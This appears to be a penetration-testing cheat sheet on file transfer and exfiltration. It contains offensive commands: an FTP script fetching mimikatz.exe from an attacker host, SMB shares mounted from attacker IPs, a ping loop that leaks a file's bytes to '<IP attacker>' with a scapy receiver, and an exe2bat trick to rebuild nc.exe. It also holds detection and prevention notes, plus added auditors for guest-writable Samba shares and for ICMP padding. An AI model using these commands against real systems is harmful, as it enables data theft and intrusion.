```bash
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
Windows client
```bat
#Works well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
SMB
Kali as server
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Or you can create an SMB share using samba:
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
```
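The `[public]` stanza above combines `guest ok = Yes` with `read only = no`, which is exactly what an auditor looks for on a host that should not be serving anonymous writable shares. The following checker is an added example, not part of the original page; it parses a constructed smb.conf (including the stanza above and a read-only share for contrast) and reports every guest-writable share.

```python
"""Audit an smb.conf for shares that let guests write, the combination the
[public] stanza above enables (guest ok = Yes, read only = no). Added example,
not part of the page; the sample config below is constructed."""
import configparser

TRUE_WORDS = {"yes", "true", "1"}          # samba boolean spellings (case-insensitive)


def _flag(section, names, default):
    """Read the first present boolean parameter among the samba synonyms in names."""
    for name in names:
        if name in section:
            return section[name].strip().lower() in TRUE_WORDS
    return default


def guest_writable_shares(conf_text: str):
    """Return (share, path) for every share that accepts unauthenticated writes."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    findings = []
    for share in cp.sections():
        if share in ("global", "printers", "print$"):
            continue
        sec = cp[share]
        guest = _flag(sec, ("guest ok", "public"), False)
        # "writable"/"writeable" are the inverse of "read only"; samba's default is read only = yes
        writable = _flag(sec, ("writable", "writeable"), False) or not _flag(sec, ("read only",), True)
        if guest and writable:
            findings.append((share, sec.get("path", "")))
    return findings


# Constructed sample: the weak stanza from above plus a read-only guest share for contrast.
SAMPLE_CONF = """\
[global]
workgroup = WORKGROUP
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
[docs]
path = /srv/docs
read only = yes
guest ok = yes
"""

if __name__ == "__main__":
    for share, path in guest_writable_shares(SAMPLE_CONF):
        print(f"guest-writable share [{share}] at {path}")
```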
Exfiltration Techniques on Windows
Exfiltration Over C2 Channels
When exfiltrating data over command and control (C2) channels, an attacker can leverage existing C2 infrastructure to blend in with legitimate traffic. This can include using encrypted channels, steganography, or other obfuscation techniques to avoid detection.
Exfiltration Over Alternative Protocols
Attackers can also exfiltrate data using alternative protocols such as DNS, ICMP, or HTTP. By encoding data within the protocol traffic, an attacker can bypass network security controls that may only be inspecting specific protocols.
Exfiltration Over Trusted Protocols
Utilizing trusted protocols like HTTPS or DNS can help an attacker blend in with normal network traffic. By abusing these protocols to exfiltrate data, an attacker can avoid raising suspicion from security monitoring tools.
Exfiltration Over Encrypted Channels
Encrypting exfiltrated data can help evade detection by security tools that are not able to inspect encrypted traffic. By using encryption, an attacker can make it more challenging for defenders to identify and block exfiltration attempts.
```
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
Exfiltration is the unauthorized transfer of data from a target. This can be achieved through various methods, such as:
Email: Sending sensitive data as email attachments.
FTP: Transferring data using File Transfer Protocol.
DNS: Sending data through DNS requests.
HTTP/HTTPS: Using HTTP or HTTPS protocols to exfiltrate data.
Steganography: Hiding data within other files to avoid detection.
Physical: Removing data physically from a target location.
Detection
Detecting exfiltration can be challenging due to the covert nature of the activity. Some common detection methods include:
Network Monitoring: Monitoring network traffic for unusual patterns.
Endpoint Monitoring: Monitoring endpoint devices for unauthorized data transfers.
Data Loss Prevention (DLP): Using DLP solutions to detect and prevent data exfiltration.
Behavioral Analytics: Analyzing user behavior to identify suspicious activities.
Encryption: Implementing encryption to protect data from being exfiltrated.
Prevention
Preventing exfiltration requires a multi-layered approach to security. Some prevention techniques include:
Access Control: Limiting access to sensitive data to authorized personnel only.
Network Segmentation: Segmenting networks to prevent lateral movement of attackers.
User Training: Educating users about the risks of data exfiltration and how to prevent it.
Security Policies: Implementing strict security policies to govern data handling practices.
Security Tools: Deploying security tools such as firewalls, IDS/IPS, and SIEM solutions to detect and prevent exfiltration attempts.
By understanding exfiltration techniques and implementing appropriate detection and prevention measures, organizations can better protect their data from unauthorized access and transfer.
```bash
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will send 4 bytes per ping packet (you could probably increase this until 16)
```
```python
from scapy.all import *

#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:  # echo reply: the kernel echoes the request payload back
            data = pkt[ICMP].load[-4:]  # Read the 4 interesting bytes (the -p pattern)
            print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)
```
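The `ping -p` loop above leaves a recognisable footprint: the echo data area is a short unit repeated over and over instead of the stock filler that Linux and Windows ping use. The detector below is an added example, not the page's or ippsec's code; it classifies ICMP echo payloads offline from constructed samples and reports the repeated unit, and it assumes iputils writes a 16-byte timestamp before its byte-equals-offset filler.

```python
"""Flag ICMP echo payloads padded with a short repeated unit, the footprint the
`ping -p <hex>` loop above leaves, instead of the stock Linux/Windows filler.
Added example (not from the page); sample payloads below are constructed."""

TS_LEN = 16                                   # assumption: iputils stores a 16-byte timestamp first
WINDOWS_FILLER = b"abcdefghijklmnopqrstuvwabcdefghi"   # stock Windows ping data (32 bytes)
MAX_PAD_BYTES = 16                            # ping -p accepts at most 16 pad bytes


def smallest_period(data: bytes, limit: int = MAX_PAD_BYTES):
    """Shortest unit length p < len(data), p <= limit, such that data is that unit repeated."""
    for p in range(1, min(limit, len(data) - 1) + 1):
        if (data[:p] * (len(data) // p + 1))[: len(data)] == data:
            return p
    return None


def classify_echo_payload(payload: bytes) -> dict:
    """Classify the data bytes of one echo request/reply (everything after the ICMP header)."""
    result = {"verdict": "unknown", "period": None, "unit": b""}
    if payload == WINDOWS_FILLER:
        result["verdict"] = "standard-windows"
    elif len(payload) > TS_LEN and all(payload[i] == (i & 0xFF) for i in range(TS_LEN, len(payload))):
        # assumption: stock iputils fills data byte i with the value i after the timestamp
        result["verdict"] = "standard-linux"
    else:
        # ping -p repeats the pad bytes over the data area; a leading timestamp (if any)
        # overwrites the start, so try skipping 16, 8 or 0 bytes before looking for the unit.
        for skip in (TS_LEN, 8, 0):
            body = payload[skip:]
            period = smallest_period(body)
            if period is not None:
                result.update(verdict="padded-pattern", period=period, unit=body[:period])
                break
    return result


def suspicious_units(payloads):
    """Return the pad unit of every payload that looks like ping -p padding, in order."""
    hits = []
    for payload in payloads:
        verdict = classify_echo_payload(payload)
        if verdict["verdict"] == "padded-pattern":
            hits.append(verdict["unit"])
    return hits


# Constructed samples: stock Linux and Windows echoes, then two pings sent as
# `ping -p 50415353` and `ping -p 574f5244` (hex for "PASS" and "WORD").
SAMPLES = [bytes(TS_LEN) + bytes(range(0x10, 0x38)), WINDOWS_FILLER,
           bytes(TS_LEN) + b"PASS" * 10, bytes(TS_LEN) + b"WORD" * 10]

if __name__ == "__main__":
    for unit in suspicious_units(SAMPLES):
        print("echo payload carries a repeated pad unit:", unit)
```

Feed it the ICMP data field from a capture (everything after the 8-byte ICMP header) and alert on `padded-pattern` verdicts; stock pings from either OS fall through to the standard verdicts.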
SMTP
If you can send data to an SMTP server, you can create an SMTP server to receive that data using python:
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
TFTP
Present by default in XP and 2003 (in other versions it has to be added explicitly during installation).
In Kali, start the TFTP server:
```bash
#I didn't get these options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
VBScript is a scripting language widely used for Windows scripting. It can be used effectively to carry out data transfer operations for exfiltration.
The debug.exe program not only allows inspecting binaries but can also rebuild them from hex. This means that, given the hex of a binary, debug.exe can generate the binary file. However, it is important to note that debug.exe is limited to creating files up to 64 kb in size.
```bash
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
Then copy and paste the content into the Windows shell and a file called nc.exe will be created.